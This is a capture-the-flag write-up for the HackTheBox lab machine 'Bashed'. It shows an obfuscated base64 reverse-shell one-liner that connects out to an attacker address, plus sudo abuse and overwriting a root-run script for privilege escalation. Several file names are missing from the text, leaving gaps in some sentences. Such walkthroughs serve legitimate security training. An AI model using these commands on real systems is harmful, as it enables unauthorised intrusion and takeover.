Write up for the HTB machine 'Bashed'
1. Recon
1.1. Nikto
cmd: nikto -host
Our nikto scan reveals to us a number of files and directories
The path /dev/phpbash.php
seems to be a remote shell
So let's use this to get a reverse shell by running the following command along with a netcat listener
echo "c2ggLWkgPiYgL2Rldi90Y3AvMTAuMTAueC54LzQ0NDQgMD4mMQ==" | base64 -d | bash
Once we have our reverse shell let's start with obtaining a fully interactive shell by running python -c 'import pty;pty.spawn("/bin/bash");'
and then sudo -l
where we get the following output:
This means we don't need a password to move from our user www-data
to the user scriptmanager
, so we simply run sudo -u scriptmanager /bin/bash
is where we can find user.txt
2. Privilege escalation
Through further enumeration of the file system we can see that there is a /scripts/
folder in the root of the file system.
Simply running ls -la
we can see that
is owned by our user, scriptmanager
, and test.txt
is owned by the root user.
Therefore we could assume that the script
is being run by the root user (perhaps through a cronjob, or some sort of other automation), and since
is owned by our user, we have permissions to edit it.
So, let's replace
with a python script for a reverse shell. We can do this by using echo '{python code here}' >
when in the /scripts/
Spin up your netcat listener on the same port that is in your script and wait until
is run to catch your reverse shell as root.
Finally, navigate to /root/
for root.txt
Last updated